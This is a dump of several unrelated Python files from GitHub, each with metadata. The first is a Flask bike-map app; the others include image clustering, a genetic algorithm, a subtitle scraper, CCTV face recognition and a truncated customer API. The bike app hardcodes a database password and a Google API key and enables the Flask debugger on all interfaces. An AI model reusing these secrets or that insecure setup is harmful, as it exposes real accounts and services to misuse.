# NOTE(review): credentials are hardcoded in source -- move to environment
# variables / a secrets store before publishing.
app.config['MYSQL_HOST'] = 'dbbikes.cvvkn6jkfbdf.eu-west-1.rds.amazonaws.com'
app.config['MYSQL_USER'] = 'SEGroup25'
app.config['MYSQL_PASSWORD'] = 'SEGroup25?'
app.config['MYSQL_DB'] = 'dbbikes'
app.config['MYSQL_PORT'] = 3306
# create a connection to the database (DictCursor -> rows as dicts)
conn = pymysql.connect(
    host=app.config['MYSQL_HOST'],
    user=app.config['MYSQL_USER'],
    password=app.config['MYSQL_PASSWORD'],
    db=app.config['MYSQL_DB'],
    port=app.config['MYSQL_PORT'],
    cursorclass=pymysql.cursors.DictCursor
)
# Creating the route for the main page the user will access
@app.route('/')
def index():
    """Main map page: join latest availability with station metadata and
    render markers for every station."""
    # cursor that will execute the SQL query to the database
    cursor = conn.cursor()
    # Latest snapshot: the most recent 117 availability rows (one per station).
    cursor.execute('SELECT * FROM availability ORDER BY last_update DESC LIMIT 117')
    availability_results = cursor.fetchall()
    # All station metadata (coordinates, names, numbers).
    cursor.execute('SELECT * FROM stations')
    location_results = cursor.fetchall()
    # Debugging code print statements to make sure the query executed successfully
    print(availability_results)
    print(location_results)
    # Join each station with its availability row by station number.
    locations = []
    for location in location_results:
        latitude = location['position_lat']
        longitude = location['position_long']
        name = location['stat_name']
        number = location['number']
        # NOTE(review): bike_stands_available is only assigned inside the
        # matching branch below -- a station with no availability row raises
        # NameError at the append.  Confirm every station always has a row.
        bikes_available = None
        for availability in availability_results:
            if availability['number'] == location['number']:
                bikes_available = availability['available_bikes']
                bike_stands_available = availability['available_bike_stands']
                break
        # Adding each to the list locations
        locations.append((latitude, longitude, bikes_available, name, bike_stands_available,number))
    # Rendered by the template to place map markers and info windows.
    return render_template('index.html', API_KEY='AIzaSyCmEmTVXz4FLSsTM3JME9J3VW-WXECqmKw', locations=locations)
# Route for when the user wants to route from one station to another
@app.route('/mapping.html')
def map():
    """Routing page: identical data assembly to index(), rendered with the
    mapping template.  NOTE(review): duplicates index() -- consider a shared
    helper.  Also shadows the builtin ``map``."""
    cursor = conn.cursor()
    cursor.execute('SELECT * FROM availability ORDER BY last_update DESC LIMIT 117')
    availability_results = cursor.fetchall()
    # Getting the locations
    cursor.execute('SELECT * FROM stations')
    location_results = cursor.fetchall()
    print(availability_results)
    print(location_results)
    # extracting all the lat and long values
    locations = []
    for location in location_results:
        latitude = location['position_lat']
        longitude = location['position_long']
        name = location['stat_name']
        number = location['number']
        bikes_available = None
        for availability in availability_results:
            if availability['number'] == location['number']:
                bikes_available = availability['available_bikes']
                bike_stands_available = availability['available_bike_stands']
                break
        locations.append((latitude, longitude, bikes_available, name, bike_stands_available,number))
    return render_template('mapping.html', API_KEY='AIzaSyCmEmTVXz4FLSsTM3JME9J3VW-WXECqmKw', locations=locations)
# Route that will return the news portion of the site
@app.route('/news.html')
def news():
    """Static news page."""
    return render_template('news.html')
# Route that will return the how-to portion of the site
@app.route('/how-to.html')
def howto():
    """Static how-to page."""
    return render_template('how-to.html')
@app.route('/availability/<int:station_id>')
def predict_bikes(station_id):
    """Return JSON mapping hour of day (0-23) -> predicted available bikes."""
    from datetime import datetime
    today = datetime.today()
    weekday, month = today.weekday(), today.month
    # One feature row per hour; the 0/99 columns mirror the training feature
    # layout (presumably placeholder values -- TODO confirm against pipeline).
    features = [[station_id, month, hour, 0, 99, 99, 99, 99, weekday]
                for hour in range(24)]
    hourly = bike_model.predict(features).tolist()
    return json.dumps({hour: bikes for hour, bikes in enumerate(hourly)})
@app.route('/standsavailability/<int:stand_id>')
def predict_stands(stand_id):
    """Return JSON mapping hour of day (0-23) -> predicted free bike stands."""
    from datetime import datetime
    today = datetime.today()
    weekday, month = today.weekday(), today.month
    # One feature row per hour; the 0/99 columns mirror the training feature
    # layout (presumably placeholder values -- TODO confirm against pipeline).
    features = [[stand_id, month, hour, 0, 99, 99, 99, 99, weekday]
                for hour in range(24)]
    hourly = stands_model.predict(features).tolist()
    return json.dumps({hour: stands for hour, stands in enumerate(hourly)})
# Start the application
if __name__ == "__main__":
    # NOTE(review): debug=True exposes the Werkzeug debugger; disable in production.
    app.run(host ="0.0.0.0", port =8080, debug = True)
| Winnie901/Software-Engineering-Project-Git5 | app.py | app.py | py | 5,366 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "pickle.load",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "pickle.load",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask.Flask",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pymysql.cursors.connect",
"li... |
41681774832 | import cv2
import numpy as np
import time
import matplotlib.pyplot as plt
plt.rcParams['font.sans-serif']=['SimHei']
plt.rcParams['axes.unicode_minus']=False
m=2
# Initialize the membership matrix U
def Initial_U(sample_num, cluster_n):
    """Random (cluster_n, sample_num) membership matrix with unit column sums.

    sample_num: number of samples; cluster_n: number of clusters.  Each
    column is normalized so a sample's memberships form a distribution.
    """
    memberships = np.random.rand(cluster_n, sample_num)
    # Multiply each column by the reciprocal of its sum (broadcasts row-wise).
    return memberships * (1 / memberships.sum(axis=0))
# Compute the cluster centers
def Cen_Iter(data, U, cluster_n):
    """FCM center step: recompute each cluster center from memberships U.

    Each center is the membership-weighted mean of the data, with weights
    u_ij ** m (module-level fuzzifier m).
    """
    centers = np.zeros(cluster_n)
    for idx in range(cluster_n):
        weights = U[idx] ** m  # fuzzified memberships u_ij^m
        centers[idx] = np.dot(weights, data) / weights.sum()
    return centers
# Update the membership matrix
def U_Iter(data, U, c):
    """FCM membership step: update U in place from the current centers c.

    u_ij = 1 / sum_k (||x_j - c_i|| / ||x_j - c_k||) ** (2 / (m - 1)),
    using the module-level fuzzifier m.  Returns the mutated U.
    """
    cluster_n, sample_num = U.shape
    for i in range(cluster_n):
        for j in range(sample_num):
            dist_ij = np.linalg.norm(data[j] - c[i])
            total = 0
            for k in range(cluster_n):
                ratio = dist_ij / np.linalg.norm(data[j] - c[k])
                total = ratio ** (2 / (m - 1)) + total
            U[i, j] = 1 / total
    return U
def FCM(img_path,cluster_n=5,iter_num=10):  # iteration count defaults to 10
    """Fuzzy C-Means segmentation of a grayscale image.

    Loads *img_path* as grayscale, clusters pixel intensities into
    *cluster_n* fuzzy clusters over *iter_num* iterations, rebuilds the
    image from the final cluster centers, and shows/saves a side-by-side
    comparison with the original.
    """
    # Read the image as grayscale
    start = time.time()
    img=cv2.imread(img_path,0)
    # Flatten the image into a single column of pixel intensities
    data=img.reshape(img.shape[0]*img.shape[1],1)
    print("开始聚类")
    sample_num = len(data)
    # Initialize the membership matrix U
    U = Initial_U(sample_num, cluster_n)
    for i in range(0, iter_num):
        # Alternate the center step and membership step of FCM.
        C = Cen_Iter(data, U, cluster_n)
        U = U_Iter(data,U, C)
        print("第%d次迭代" % (i + 1), end="")
        print("聚类中心", C)
    # Hard label per pixel: the cluster with the highest membership
    label = np.argmax(U, axis=0)
    # Final cluster-center vector
    center = C
    print("聚类完成,开始生成图片")
    # Rebuild the image: replace each pixel by its cluster's center intensity
    new_img=center[label]
    # Restore the original image shape
    new_img=np.reshape(new_img,img.shape)
    # Image data must be uint8 for display
    new_img=new_img.astype('uint8')
    plt.subplot(121)
    plt.imshow(img, cmap="gray")
    plt.title("原图")
    plt.axis('off')
    plt.subplot(122)
    plt.imshow(new_img, cmap="gray")
    plt.title("FCM,%d个聚类中心"%cluster_n)
    plt.axis('off')
    end = time.time()
    print("循环运行时间:%.2f秒" % (end - start))
    plt.show()
    # Save only the segmented result after the comparison is shown.
    plt.imshow(new_img, cmap="gray")
    plt.axis('off')
    plt.savefig('FCM_Baboon')
FCM("photo2.png",cluster_n=4)
| LAS1520/Image-Processing | final pj/codes/FCM.py | FCM.py | py | 2,715 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "matplotlib.pyplot.rcParams",
"line_number": 6,
"usage_type": "attribute"
},
{
"ap... |
14524764116 | import random
from itertools import combinations
from ltga.Mutation import Mutation
class LTGA(object):
    """Linkage Tree Genetic Algorithm driver (coroutine-based evaluation)."""

    def buildTree(self, distance):
        """Agglomeratively cluster gene indices into a linkage tree.

        ``distance(individuals, c1, c2, lookup)`` scores a cluster pair
        (``lookup`` is a shared memo dict); ties at the minimum are broken
        randomly.  Returns the merged subtrees (crossover masks), excluding
        the final all-genes cluster.
        """
        clusters = [(i,) for i in range(len(self.individuals[0].genes))]
        subtrees = [(i,) for i in range(len(self.individuals[0].genes))]
        random.shuffle(clusters)
        random.shuffle(subtrees)
        lookup = {}

        def allLowest():
            # Collect every cluster pair at the current minimum distance.
            minVal = 3  # acts as +inf; distances are assumed < 3 -- TODO confirm
            results = []
            for c1, c2 in combinations(clusters, 2):
                result = distance(self.individuals, c1, c2, lookup)
                if result < minVal:
                    minVal = result
                    results = [(c1, c2)]
                # BUGFIX: this must be elif -- with a plain `if`, a pair that
                # lowers the minimum was appended twice (once by the reset,
                # once here), biasing random.choice toward it.
                elif result == minVal:
                    results.append((c1, c2))
            return results

        while len(clusters) > 1:
            c1, c2 = random.choice(allLowest())
            clusters.remove(c1)
            clusters.remove(c2)
            combined = c1 + c2
            clusters.append(combined)
            # The final merge spans all genes and is not a useful mask.
            if len(clusters) != 1:
                subtrees.append(combined)
        return subtrees

    def smallestFirst(self, subtrees):
        """Order crossover masks from smallest to largest."""
        return sorted(subtrees, key=len)

    def generate(self, initialPopulation, evaluator, distanceFcn, crossoverFcn):
        """Coroutine: yields individuals needing evaluation; callers send
        each one's fitness back in.  Runs generations of tree building,
        crossover and mutation until the population converges (all identical
        or unchanged from the previous generation)."""
        self.individuals = initialPopulation
        distance = distanceFcn
        ordering = self.smallestFirst
        crossover = crossoverFcn
        beforeGenerationSet = set(self.individuals)
        while True:
            subtrees = self.buildTree(distance)
            masks = ordering(subtrees)
            generator = crossover(self.individuals, masks)
            individual = next(generator)
            while True:
                # Hand the individual out for evaluation; feed the fitness
                # back into the crossover coroutine.
                fitness = yield individual
                try:
                    individual = generator.send(fitness)
                except StopIteration:
                    break
            self.individuals = Mutation(evaluator).mutate(self.individuals)
            # If all individuals are identical, or nothing changed this
            # generation, the search has converged.
            currentSet = set(self.individuals)
            if (len(currentSet) == 1 or
                    currentSet == beforeGenerationSet):
                break
            beforeGenerationSet = currentSet
| Duzhinsky/scheduling | ltga/LTGA.py | LTGA.py | py | 2,220 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "random.shuffle",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "random.shuffle",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "itertools.combinations",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "random.choice",
... |
8954419715 | import requests,urllib
import os,sys,re,zipfile,shutil,io
from bs4 import BeautifulSoup
cwd = os.getcwd()  # NOTE(review): unused -- kept for compatibility
# taking the movie input: split on non-alphanumerics, drop empty tokens
movie_name = [s for s in re.split("[^0-9a-zA-Z]",input("enter the movie name : \n"))]
movie_name = list(filter(lambda a: a != '', movie_name))
m1 = ' '.join(map(str,movie_name))
# Encoding/format tokens are mandatory; loop until something is entered.
encodings = []
while len(encodings) == 0:
    encodings = [s.lower() for s in re.split("[^0-9a-zA-Z]",input("enter the storage format (eg.720p,bluray,brrip,xvid,hdtv etc) (must) \n"))]
    if len(encodings) == 0 :
        print("You must enter some encoding format")
encodings = list(filter(lambda a: a != '', encodings))
m2 = ' '.join(map(str,encodings))
# Full search phrase = movie name + encoding tokens.
m1 = m1 + ' ' + m2
print("you have searched for \n",m1)
search_string = m1.split()
#search_string
''' Preparing the query '''
# Build the subscene search URL: tokens joined with '+'.
search_url = "https://subscene.com/subtitles/title?q="
search_url += search_string[0]
for words in search_string[1:]:
    search_url += ("+" + words)
search_url += "&l="
print(search_url)
r = requests.get(search_url)
soup = BeautifulSoup(r.content,"lxml")
#print(soup)
# Each result row's first cell (td.a1) holds the subtitle link + language span.
subs = soup.find_all("td", class_ = "a1")
#print(subs)
# Pick the first result whose language span mentions English.
# NOTE(review): if no English row matches, download_link is never assigned
# and the request below raises NameError.
for elements in range(len(subs)) :
    res = subs[elements].find_all("span", class_="l r positive-icon")
    s = str(res)
    m = re.search('English',s)
    if m :
        target = subs[elements]
        t = target.find("a")
        download_link = t['href']
        break
# download that link: the subtitle page exposes a 'downloadButton' anchor
r1 = requests.get("https://subscene.com" + download_link)
soup = BeautifulSoup(r1.content,"lxml")
download = soup.find_all('a',attrs={'id':'downloadButton'})[0].get("href")
#print(download)
r2 = requests.get("http://subscene.com" + download)
download_link = r2.url
#print(r2.encoding)
#print(file_path)
# Fetch the zip archive in memory and extract into the working directory.
f = requests.get(download_link)
zipped = zipfile.ZipFile(io.BytesIO(f.content))
zipped.extractall()
print("subtitles downloaded succesfully")
| styx97/movie_subs | movie_subs.py | movie_subs.py | py | 1,880 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "os.getcwd",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "re.split",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 40,
... |
5104206621 | import os
# Room-monitoring demo: run LBPH face recognition + HOG human detection over a
# recorded video, track how long the room stays in the 'unknown person' /
# 'known person' states, and play an alarm when an unknown person lingers.
# Room status codes: 0 = empty, 1 = unknown, 2 = known.
import cv2
import numpy as np
import faceRecognition as fr
import HumanDetection as hd
import time
from playsound import playsound
# room status variable. 0 = empty, 1 = unknown, 2 = known
status = 0
# timestamp accumulators: [start_time, end_time, duration, timer_running]
tsk = [0,0,0,False] # duration of the 'known' state, used to detect an empty room
tsu = [0,0,0,False] # duration of the 'unknown' state
# Load the training data and open the video capture source
face_recognizer = cv2.face.LBPHFaceRecognizer_create()
face_recognizer.read('trainingData.yml')# load previously saved training data
name = {0 : "TestImages", 1 : "Ronalod", 2 : "Faruq", 3 : "Fadhil", 4 : "Unknown"}
# Video names for the final presentation
# known1 -> known, isempty
# coba14 -> unknown alarm
# coba 16 -> unknown alarm
# CekFadhilFaruqNaila1 -> detect several people at once
# NOTE(review): '\c' happens not to be a Python escape so this string works by
# accident; a raw string (r'\coba16') would be safer.  Same for the absolute
# Windows path below.
filename = '\coba16'
hog = hd.initiate()
cap=cv2.VideoCapture('D:\Bahan Kuliah\PyCharm Projects\FaceRecog\Video'+ filename +'.mp4')
fps_read = cap.get(cv2.CAP_PROP_FPS)
print("Input Video FPS :",fps_read)
height = int( cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
width = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))
print("Input Video Frame Size : ",width," x ",height)
# annotated output video, fixed at the 640x480 processing resolution
out = cv2.VideoWriter(
    'output '+ 'coba16' +'.avi',
    cv2.VideoWriter_fourcc(*'MJPG'),
    fps_read,
    (640,480))
while (cap.isOpened()):
    ret,test_img=cap.read()# grab a frame; returns (ok_flag, image)
    if ret :
        # Resizing Image for faster detection
        resized_img = cv2.resize(test_img, (640, 480))
        #resized_img = test_img
        timer = cv2.getTickCount()
        if status == 0 or status == 1: # previous status was empty or unknown
            faces_detected,gray_img=fr.faceDetection(resized_img)
            #print("faces_detected:",faces_detected)
            for (x,y,w,h) in faces_detected:
                cv2.rectangle(resized_img,(x,y),(x+w,y+h),(0,0,255),thickness=2) # draw a box around each face
            #cv2.imshow('face detection Tutorial ',resized_img)
            for face in faces_detected:
                (x,y,w,h)=face
                # NOTE(review): slices use y:y+w and x:x+h -- w and h look
                # swapped; this is only correct for square detections.
                roi_gray=gray_img[y:y+w, x:x+h]
                label,confidence=face_recognizer.predict(roi_gray)# predict the face identity
                print("confidence:",confidence)
                print("label:",label)
                fr.draw_rect(resized_img,face)
                predicted_name=name[label]
                if confidence < 80: # confidence below 80: accept and print the identity
                    fr.put_text(resized_img,predicted_name,x,y)
                    status = 2 # change status to known
                else:
                    predicted_name=name[4]
                    fr.put_text(resized_img,predicted_name,x,y)
                    status = 1 # change status to unknown
        if status == 0 or status == 1 :
            regions = hd.detect(hog, resized_img, (4,4), (4, 4), 1.2)
            hd.boxes(resized_img, regions)
            if len(regions) !=0 : # a human was detected
                if status == 0 :
                    status = 1
                print('Human Detected')
                # update the 'unknown' duration timer
                if tsu[3] == False:
                    tsu[0] = time.time()
                    tsu[3] = True
                elif tsu[3] == True:
                    tsu[1] = time.time()
                    tsu[2] = tsu[1] - tsu[0]
                tsk = [0, 0, 0, False]
        if status == 2 :
            tsu =[0,0,0,False] # reset the 'unknown' timer
            regions = hd.detect(hog, resized_img, (4,4), (4, 4), 1.2)
            hd.boxes(resized_img, regions)
            if len(regions) == 0:
                print('Human Not Detected')
                # update the 'room empty while known' timer
                if tsk[3] == False:
                    tsk[0] = time.time()
                    tsk[3] = True
                elif tsk[3] == True:
                    tsk[1] = time.time()
                    tsk[2] = tsk[1] - tsk[0]
            else :
                tsk = [0,0,0,False] # reset when a human is detected
        # showing fps
        cv2.putText(resized_img, "Fps:", (20, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 0, 255), 2);
        fps = cv2.getTickFrequency() / (cv2.getTickCount() - timer); cv2.putText(resized_img, str(int(fps)), (75, 40), cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2);
        # rescale the measured durations from processing speed to source fps
        tsu[2] = tsu[2]*(fps/fps_read)
        tsk[2] = tsk[2]*(fps/fps_read)
        if status == 1: # status unknown
            print("Waktu terdeteksi : ")
            print(tsu, '\n')
            if tsu[2] >= 10: # unknown person present for more than 10 seconds
                print("alarm triggered!")
                playsound("Industrial Alarm.wav")
                break # exit the program
        if status == 2:
            print("Waktu tidak terdeteksi : ")
            print(tsk, '\n')
            if tsk[2] >= 2: # e.g. nobody detected (room empty) for a while
                print("Reset Status menjadi 0")
                status = 0 # change status back to empty
        cv2.imshow('face recognition tutorial ',resized_img)
        print("Status : ",status)
        out.write(resized_img.astype('uint8'))
        if cv2.waitKey(1) & 0xFF == ord('q'):
            # Press q to stop, or wait until the end of the video
            break
    else :
        break
cap.release()
out.release()
cv2.destroyAllWindows()
# final report of the measured durations
print('Waktu awal terdeteksi : ', tsu[0], '\n')
print('Waktu akhir terdeteksi : ', tsu[1], '\n')
print('Durasi terdeteksi : ', tsu[2],' detik','\n')
print('Waktu awal tidak terdeteksi : ', tsk[0], '\n')
print('Waktu akhir tidak terdeteksi : ', tsk[1], '\n')
print('Durasi tidak terdeteksi : ', tsk[2],' detik','\n')
if tsu[2] >=10:
    print ("Alarm Triggered!")
    playsound("Industrial Alarm.wav")
print("Alarm Triggered!")
playsound("Industrial Alarm.wav")
playsound("Industrial Alarm.wav") | AfifHM/Smart-CCTV-Using-Face-and-Human-Detection | FullProgram/Source Code/forVideo.py | forVideo.py | py | 5,897 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "cv2.face.LBPHFaceRecognizer_create",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cv2.face",
"line_number": 16,
"usage_type": "attribute"
},
{
"api_name": "HumanDetection.initiate",
"line_number": 26,
"usage_type": "call"
},
{
"api_name... |
71091610109 | root_path = '/mnt/d/KLTN/CNN-Based-Image-Inpainting/'
# Training configuration: dataset globs, output locations and hyperparameters.
train_glob = root_path + 'dataset/places2/train/*/*/*.jpg'
test_glob = root_path + 'dataset/places2/test/*.jpg'
mask_glob = root_path + 'dataset/irregular_mask1/*.png' #2 for partialconv
log_dir = root_path + 'training_logs'
save_dir = root_path + 'models'
checkpoint_path = root_path + "models/gatedconv.pth"
learning_rate = 1e-4 #5e-4 for gated conv
epoch = 50
train_batch_size = 4
test_batch_size = 4
log_interval = -1 #no log
import os
import torch
from dataloader.dataset import *
from gatedconvworker.gatedconvworker import GatedConvWorker
print("Creating output directories")
if not os.path.exists(save_dir):
    os.makedirs(save_dir)
if not os.path.exists(log_dir):
    os.makedirs(log_dir)
print("Initiating training sequence")
# free any cached GPU memory left over from a previous run
torch.cuda.empty_cache()
print("Initializing dataset with globs:", train_glob, test_glob, mask_glob)
# Dataset comes from the star-import of dataloader.dataset above
data_train = Dataset(train_glob, mask_glob, False)
data_test = Dataset(test_glob, mask_glob, False)
worker = GatedConvWorker(checkpoint_path, learning_rate)
worker.Train(epoch, train_batch_size, test_batch_size, data_train, data_test, log_interval)
| realphamanhtuan/CNN-Based-Image-Inpainting | traingatedconv.py | traingatedconv.py | py | 1,142 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "os.path.exists",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.makedirs",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_nu... |
7874634889 | import numpy as np
import json
import os
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
class LatentConverter():
    """Convert reviewer star ratings into normalized / latent-space vectors.

    The converter is anchored to a fixed ordered list of places; every vector
    it produces is indexed by position in that list.
    """
    def __init__(self, places_path):
        # Build the ordered place list and a place -> index lookup from JSON.
        place_list = []
        place2idx = {}
        with open(places_path, encoding='utf-8') as f:
            for p_idx, place in enumerate(json.load(f)):
                place = tuple(place)  # JSON lists must become hashable keys
                place2idx[place] = p_idx
                place_list.append(place)
        self.places_path = places_path
        self.place_len = len(place_list)
        self.place_list = place_list
        self.place2idx = place2idx
    def get_normalized(self, reviewer_path):
        """Return a z-scored star vector (length place_len) for one reviewer.

        Places the reviewer never rated get 0; if no review overlaps the known
        places (or the ratings have zero variance) the whole vector is 0.
        """
        with open(reviewer_path, encoding='utf-8') as f:
            review_list = json.load(f)
        # keep only reviews whose (place, address) pair is in the place list
        stars_dict = {}
        for review in review_list:
            place = (review['place'], review['address'])
            if place in self.place2idx:
                stars_dict[place] = review['stars']
        if len(stars_dict)==0:
            print('Reviewer "' + reviewer_path + '":\n\tNone of the reviews overlaps with "' + self.places_path + '"')
            mean, std = 0, 0
        else:
            stars_list = list(stars_dict.values())
            mean, std = np.mean(stars_list), np.std(stars_list)
        normalized = np.zeros(self.place_len)
        for p_idx, place in enumerate(self.place_list):
            if std==0:
                normalized[p_idx] = 0
            else:
                normalized[p_idx] = (stars_dict[place]-mean)/std if place in stars_dict else 0
        return normalized
    def gen_proj(self, guides_normalized, latent_dim=20):
        """Return an LSI projection: the top *latent_dim* left singular
        vectors of the place-by-guide matrix, transposed to (latent, place)."""
        u, s, vh = np.linalg.svd(guides_normalized)
        print('gen_proj: The first', latent_dim, 'latent dimensions are taken.')
        print('Singular values:\n', s)
        # guides_smoothed = np.matmul(np.matmul(u[:,:20], np.diag(s[:20])), vh[:20,:])
        # print('Smoothed:\n', guides_smoothed)
        # # for debug use
        # guides_normalized = guides_normalized.transpose()
        # guides_smoothed = guides_smoothed.transpose()
        return u[:,:latent_dim].transpose()
    def get_latent(self, proj, reviewer_path):
        """Project one reviewer's normalized star vector into latent space."""
        return np.matmul(proj, self.get_normalized(reviewer_path))
    @staticmethod
    def visualize(guides_latent, dims=(0,1,2)):
        """Scatter-plot guides along three chosen latent dimensions."""
        fig = plt.figure()
        ax = fig.add_subplot(111, projection='3d')
        X = guides_latent[dims[0],:]
        Y = guides_latent[dims[1],:]
        Z = guides_latent[dims[2],:]
        ax.scatter(X, Y, Z)
        ax.set_xlabel('X')
        ax.set_ylabel('Y')
        ax.set_zlabel('Z')
        plt.show()
class ReviewReader():
    """Resolve guide IDs to their per-guide review JSON files.

    *guides_path* is a text file with one guide ID per line.  *reviews_path*
    is a directory of files named like
    ``reviews_guide length=<n> guideID=<id>.json``; the guide ID is parsed
    from the third whitespace-separated token of each file name.
    """
    def __init__(self, guides_path, reviews_path):
        self.reviews_path = reviews_path
        # guide_list[<number>] = <guide ID>
        guide_list = []
        with open(guides_path, encoding='utf-8') as f:
            for line in f:
                # Bug fix: the original used line[:-1], which chops the last
                # character of the final ID when the file has no trailing
                # newline; rstrip('\n') removes only the newline if present.
                guide_list.append(line.rstrip('\n'))
        self.guide_len = len(guide_list)
        # guide_file_dict[<guide ID>] = <file name>
        guide_file_dict = {}
        for fname in os.listdir(reviews_path):
            # third token looks like "guideID=<id>.json" -> extract <id>
            guide_id = fname.split()[2].split('=')[1].split('.')[0]
            guide_file_dict[guide_id] = fname
        # self.file_name[<number>] = <file name>, ordered like guide_list
        self.file_name = [guide_file_dict[gid] for gid in guide_list]
    def getPath(self, guideNum):
        """Return the full path of the review file for guide #guideNum."""
        return os.path.join(self.reviews_path, self.file_name[guideNum])
    def getReviews(self, guideNum):
        """Load and return the list of review dicts for guide #guideNum."""
        with open(self.getPath(guideNum), encoding='utf-8') as f:
            return json.load(f)
if __name__ == '__main__':
    # Offline pipeline: build the normalized matrix, derive the projection,
    # project all guides and persist everything as .npy files.
    # initialize with a list of places
    lc = LatentConverter('places.json')
    # get reviews
    rr = ReviewReader('guides.txt', '../data/reviews_guide')
    # generate all normalized vectors (one column per guide)
    guides_normalized = np.zeros((lc.place_len, rr.guide_len))
    for g_idx in range(rr.guide_len):
        guides_normalized[:,g_idx] = lc.get_normalized(rr.getPath(g_idx))
    # generate projection matrix
    proj = lc.gen_proj(guides_normalized, latent_dim=20)
    # project guides
    guides_latent = np.matmul(proj, guides_normalized)
    # save for future use
    np.save('guides_normalized.npy', guides_normalized)
    np.save('proj.npy', proj)
    np.save('guides_latent.npy', guides_latent)
def example_get_latent():
    """Example: project one reviewer's ratings into the latent space."""
    converter = LatentConverter('places.json')
    # load the previously saved projection matrix
    projection = np.load('proj.npy')
    reviewer = '../data/reviews_guide/reviews_guide length=117 guideID=107297262039687837164.json'
    return converter.get_latent(projection, reviewer)
def example_visualize():
    """Example: scatter-plot guides along the first three latent dimensions."""
    latent = np.load('guides_latent.npy')
    # visualize the 0th, 1st, and 2nd latent dimension
    LatentConverter.visualize(latent, dims=(0, 1, 2))
| e841018/DinnerSelector | preprocessing/LSI.py | LSI.py | py | 4,229 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "json.load",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "json.load",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "numpy.std",
"line_number": 36,
... |
19400757649 | import os
import sys
import unittest
import logging
from datetime import datetime
import json
from flask import Flask, request
from flask_restful import Resource
import settings as CONST
# Make the parent directory importable so app_models / app_utils resolve
# when this module is run from its own folder.
curpath = os.path.dirname(__file__)
sys.path.append(os.path.abspath(os.path.join (curpath, "../")))
from app_models import Customer
from app_utils import MongoRepository, DbEntity
class CustomerAPI(Resource):
    """Flask-RESTful resource implementing CRUD for the 'customers' collection.

    Each request instantiates the resource, which configures file logging and
    opens a MongoRepository session using settings from the CONST module.
    """
    def __init__(self):
        # Create and configure logger; the log directory is created on demand
        logfile= os.path.abspath("{0}/{1}".format(CONST.log_settings["log_folder"], CONST.log_settings["log_file"]))
        os.makedirs( os.path.dirname(logfile), exist_ok=True)
        logging.basicConfig(
            filename=logfile,
            format='%(asctime)s %(message)s',
            filemode='a'
        )
        #Creating an object
        self.logger=logging.getLogger()
        #Setting the threshold of logger to the configured level
        self.logger.setLevel(CONST.log_settings["log_level"])

        self.entity = "customers"
        self.repo = MongoRepository(logger=self.logger,
                                    server=CONST.db_customer["url"],
                                    port=CONST.db_customer["port"],
                                    database=CONST.db_customer["db"],
                                    collection=self.entity,
                                    session_id=1)

    ###########################################################################
    # GET /customers
    # GET /customers/1
    def get(self,id=None):
        '''
        Read one record (when *id* is given) or all records.
        '''
        if id:
            self.logger.debug('Processing request to get {0} with id:{1}'.format(self.entity, id))
        else:
            self.logger.debug('Processing request to get all {0}'.format(self.entity))

        try:
            if id:
                records = self.repo.find_by_id(id)
            else:
                records = [c for c in self.repo.fetchall()]
            # NOTE(review): this returns a JSON *string*, which flask_restful
            # serializes again; kept as-is to preserve the wire format.
            return json.dumps(records), 200
        except Exception as e:
            # Bug fix: "msg = '...', str(e)" built a tuple instead of a
            # message string; log the exception text via lazy %-formatting.
            self.logger.error('Error in processing GET request. %s', str(e))
            return { 'status' : 'error' }, 500

    ###########################################################################
    # POST /customers
    def post(self):
        '''
        Create a new entity from the JSON body of the request.
        '''
        self.logger.debug('Processing POST request')

        if not request.data:
            msg = "Request to create entity needs to come with form 'data' "
            self.logger.error(msg)
            return {
                'status' : 'error',
                'msg' : msg
            }, 400

        try:
            entity = Customer( json=json.loads(request.data) )

            wellformed, msg = entity.isValid()
            if not wellformed:
                self.logger.error(msg)
                return {
                    'status' : 'error',
                    'msg' : msg
                }, 400

            result = self.repo.create(entity)
            return { 'status' : 'success' }, 200
        except Exception as e:
            # Bug fix: same tuple-instead-of-string defect as in get()
            self.logger.error('Error in processing POST request. %s', str(e))
            return { 'status' : 'error' }, 500

    ###########################################################################
    # PUT /customers/id
    def put(self, id=None):
        '''
        Update the entity identified by *id* with the JSON body of the request.
        '''
        if (not id) or (not request.data):
            msg = "Request to update entity needs to come for a specific entity id and 'data' "
            self.logger.error(msg)
            return {
                'status' : 'error',
                'msg' : msg
            }, 400

        # Bug fix: this message was composed but never logged before
        self.logger.debug('Processing request to update entity:{0} with id:{1}'.format(self.entity, id))
        try:
            entity = Customer( json=json.loads(request.data) )

            wellformed, msg = entity.isValid()
            if not wellformed:
                self.logger.error(msg)
                return {
                    'status' : 'error',
                    'msg' : msg
                }, 400

            result = self.repo.update_by_id(id,entity)
            return { 'status' : 'success' }, 200
        except Exception as e:
            self.logger.error('Error in processing PUT request. %s', str(e))
            return { 'status' : 'error' }, 500

